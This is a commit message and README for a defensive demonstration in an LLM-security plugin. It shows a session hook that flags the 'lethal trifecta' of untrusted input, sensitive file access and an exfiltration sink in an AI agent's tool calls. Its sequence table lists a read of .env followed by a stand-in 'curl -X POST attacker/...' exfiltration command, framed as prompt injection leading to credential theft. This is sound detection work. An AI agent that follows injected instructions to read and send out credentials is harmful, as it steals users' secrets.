
Kjell Tore Guttormsen 583a78c6cc feat(llm-security): add lethal-trifecta + mcp-rug-pull example contents [skip-docs]		2026-05-05 14:45:39 +02:00
Companion to `8df5d5c`, which carried only the doc updates; the example directories themselves were left out of staging by mistake. This commit adds the actual example directories:
- examples/lethal-trifecta-walkthrough/{README.md, run-trifecta.mjs, expected-findings.md}
- examples/mcp-rug-pull/{README.md, run-rug-pull.mjs, expected-findings.md}
Plus a plugin CLAUDE.md "Examples (runnable demonstrations)" section with a 4-row table covering malicious-skill-demo, prompt-injection-showcase, lethal-trifecta-walkthrough, and mcp-rug-pull, plus the state-isolation discipline notes. The marketplace root README is unchanged since the plugin's outward coverage is unchanged ([skip-docs] covers the marketplace-level gate).
expected-findings.md
README.md
run-trifecta.mjs

README.md

Lethal Trifecta Walkthrough

WARNING: This is a security demonstration fixture, NOT a real attack. All payloads are synthetic. No external network is contacted, no real file is read, no real command is executed. The script only feeds JSON payloads to one of llm-security's hook scripts.

What this demonstrates

The Rule of Two (Meta, Oct 2025): an agent must never simultaneously hold all three of:

Untrusted input — content the model didn't author (web pages, MCP output, document uploads, prompt injection surface)
Sensitive data access — files like .env, .ssh/, .aws/, credential stores
Exfiltration sink — a path off the box (HTTP POST, scp, paste sites)

Any two are acceptable. All three at once is the lethal trifecta (Simon Willison / Invariant Labs framing) — at that point, prompt injection becomes credential theft.

post-session-guard.mjs (PostToolUse hook on every tool) tracks tool calls in a 20-call sliding window and emits a SECURITY ADVISORY when all three classes appear. This walkthrough shows it firing on a 5-step sequence.
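The window check described above can be sketched as follows. This is a minimal illustration, not the hook's actual code: the function name `trifectaInWindow` and the idea of passing in a plain array of class labels are assumptions; only the 20-call window and the three class names come from this README.

```javascript
// Hypothetical sketch: names and mechanics are assumptions, not the hook's real code.
const WINDOW_SIZE = 20; // window length stated in this README
const TRIFECTA = ["input_source", "data_access", "exfil_sink"];

// Returns true when the most recent WINDOW_SIZE calls contain all three classes.
function trifectaInWindow(classes) {
  const recent = new Set(classes.slice(-WINDOW_SIZE));
  return TRIFECTA.every((c) => recent.has(c));
}

// Two legs only: no trifecta.
console.log(trifectaInWindow(["input_source", "data_access"])); // false

// All three legs inside the window: trifecta.
console.log(trifectaInWindow(["input_source", "data_access", "exfil_sink"])); // true

// The input_source leg has slid out of the 20-call window: no trifecta.
const stale = ["input_source", ...Array(20).fill("neutral"), "data_access", "exfil_sink"];
console.log(trifectaInWindow(stale)); // false
```

The last case shows why the window matters: an untrusted fetch that happened more than 20 calls ago no longer counts toward this particular check.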

Sequence

#	Tool	Class	Advisory?
1	WebFetch	input_source	no — only one class
2	Read `/path/.env`	data_access (sensitive)	no — only two classes
3	Bash `curl -X POST attacker/...`	exfil_sink	YES — trifecta closes
4	Bash `ls -la`	neutral	no — already warned in window
5	Bash `curl -X POST attacker/...`	exfil_sink	no — suppressed

The advisory at step 3 lists the evidence and recommends remediations (disable HTTP exfil, gate sensitive-path reads, narrow tool surface). Steps 4 and 5 are present to show suppression: post-session-guard writes a warning marker into the state file so the operator isn't spammed by the same trifecta repeating within the window.
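To make the suppression behavior concrete, here is a small simulation of the five-step sequence. It is a sketch under stated assumptions: the in-memory `state` object stands in for the state file, the `warned` flag stands in for the warning marker, and `runSequence` is a hypothetical name. The 20-call window is omitted because the sequence is only five calls long.

```javascript
// Hypothetical sketch of suppression; the real state-file format is not shown in this README.
const REQUIRED = ["input_source", "data_access", "exfil_sink"];

function runSequence(steps) {
  // Stand-in for the per-session state file.
  const state = { seen: [], warned: false };
  return steps.map((step) => {
    state.seen.push(step.cls);
    const closed = REQUIRED.every((c) => state.seen.includes(c));
    const advisory = closed && !state.warned;
    if (advisory) state.warned = true; // stand-in for the "warning marker"
    return { tool: step.tool, advisory };
  });
}

const steps = [
  { tool: "WebFetch", cls: "input_source" },
  { tool: "Read", cls: "data_access" },
  { tool: "Bash", cls: "exfil_sink" },
  { tool: "Bash", cls: "neutral" },
  { tool: "Bash", cls: "exfil_sink" },
];

const results = runSequence(steps);
console.log(results.map((r) => r.advisory)); // [ false, false, true, false, false ]
```

Only step 3 produces an advisory. Step 5 closes the trifecta again, but the marker set at step 3 suppresses the repeat.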

How to run

cd plugins/llm-security
node examples/lethal-trifecta-walkthrough/run-trifecta.mjs

# Detailed output (full advisory text + stderr)
node examples/lethal-trifecta-walkthrough/run-trifecta.mjs --verbose

Expected: 5 pass, 0 fail and a SECURITY ADVISORY (session-guard) preview after step 3.

Hooks / scanners involved

hooks/scripts/post-session-guard.mjs — the only hook invoked. Configurable via policy.json trifecta.mode (block / warn / off; default warn) or env var LLM_SECURITY_TRIFECTA_MODE.

This example uses mode: warn (default). In block mode the third call's advisory becomes a hard block (exit 2) and the agent action is denied — see docs/security-hardening-guide.md §3 for when to switch.
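The mode selection could look roughly like the sketch below. Two points are assumptions, because this README does not state them: that the env var takes precedence over policy.json, and that non-blocking outcomes exit with code 0. The function names `resolveTrifectaMode` and `exitCodeFor` are hypothetical; the three mode values, the `warn` default, and exit code 2 for block mode come from the text above.

```javascript
const VALID_MODES = ["block", "warn", "off"];

// Assumption: the env var wins over policy.json; the README does not state the precedence.
function resolveTrifectaMode(policy, env) {
  const candidates = [env.LLM_SECURITY_TRIFECTA_MODE, policy?.trifecta?.mode];
  return candidates.find((m) => VALID_MODES.includes(m)) ?? "warn";
}

// Assumption: everything except a block-mode detection exits 0.
// Only "exit 2 in block mode" is stated in the README.
function exitCodeFor(mode, trifectaDetected) {
  return mode === "block" && trifectaDetected ? 2 : 0;
}

console.log(resolveTrifectaMode({}, {})); // warn
console.log(resolveTrifectaMode({ trifecta: { mode: "off" } }, {})); // off
console.log(
  resolveTrifectaMode({ trifecta: { mode: "off" } }, { LLM_SECURITY_TRIFECTA_MODE: "block" })
); // block
console.log(exitCodeFor("block", true)); // 2
console.log(exitCodeFor("warn", true)); // 0
```

Unrecognized values fall through to the default in this sketch, so a typo in either setting degrades to `warn` instead of disabling the guard.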

OWASP / framework mapping

Code	Framework	Why
LLM01	OWASP LLM Top 10 (2025)	Prompt injection lands via the input_source leg
LLM02	OWASP LLM Top 10 (2025)	Sensitive Information Disclosure (the .env exfil)
ASI01	OWASP Agentic Top 10	Excessive Agency — agent holds all three capabilities
ASI02	OWASP Agentic Top 10	Agent Data Leakage — exfil sink + sensitive read

State isolation

post-session-guard stores per-session state at ${os.tmpdir()}/llm-security-session-${ppid}.jsonl. Because all five hook invocations are spawned by the same run-trifecta.mjs process, they share that script's PID as their parent PID, so the entire walkthrough lives in a single state file. The script deletes the file in a finally block before exiting. Your real session state in the same temp directory is keyed by a different parent PID and is never touched.
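The path scheme above can be illustrated with a small pure function. This is a sketch, not the hook's code: `sessionStatePath` is a hypothetical helper, and the PIDs and `/tmp` directory are made-up values. In a real hook process the two arguments would come from `os.tmpdir()` and `process.ppid`.

```javascript
// Builds the state-file path quoted above from a temp directory and a parent PID.
function sessionStatePath(tmpDir, ppid) {
  return `${tmpDir}/llm-security-session-${ppid}.jsonl`;
}

// Inside a hook process, process.ppid is the PID of whoever spawned it.
// Every hook spawned by the same runner therefore resolves to the same file.
const runnerPid = 4242; // hypothetical PID of run-trifecta.mjs
const paths = [1, 2, 3, 4, 5].map(() => sessionStatePath("/tmp", runnerPid));
console.log(new Set(paths).size); // 1

// A real session is spawned by a different parent, so its path differs.
const realSessionPid = 9001; // hypothetical PID of a real agent session
console.log(sessionStatePath("/tmp", realSessionPid) === paths[0]); // false
```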

Limitations

The walkthrough demonstrates the primary 20-call sliding-window trifecta. It does not exercise the 100-call slow-burn variant (SLOW_BURN_MIN_SPREAD = 50), the MCP-concentrated variant (all three legs from the same MCP server), behavioral drift via Jensen-Shannon divergence, or volume-threshold advisories. Those have their own unit tests under tests/lib/post-session-guard.*.
Detection is deterministic. The walkthrough does not exercise the block-mode exit-2 path; set LLM_SECURITY_TRIFECTA_MODE=block and re-run if you want to see the script fail at step 3.
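For readers unfamiliar with the Jensen-Shannon divergence mentioned in the list above, the following sketch computes it for two discrete distributions, using base-2 logarithms so the result lies between 0 and 1. It shows the general formula only. How post-session-guard builds its distributions or chooses a drift threshold is not described in this README, so nothing here should be read as the hook's implementation.

```javascript
// Kullback-Leibler divergence in bits; zero-probability terms in p contribute nothing.
function klDivergence(p, q) {
  return p.reduce((sum, pi, i) => (pi > 0 ? sum + pi * Math.log2(pi / q[i]) : sum), 0);
}

// Jensen-Shannon divergence: average KL divergence of p and q from their midpoint m.
function jsDivergence(p, q) {
  const m = p.map((pi, i) => (pi + q[i]) / 2);
  return 0.5 * klDivergence(p, m) + 0.5 * klDivergence(q, m);
}

// Identical tool-usage distributions: no drift.
console.log(jsDivergence([0.5, 0.5], [0.5, 0.5])); // 0

// Completely disjoint distributions: maximal drift.
console.log(jsDivergence([1, 0], [0, 1])); // 1
```

Unlike plain KL divergence, this measure is symmetric and stays finite when one distribution assigns zero probability to a tool the other uses.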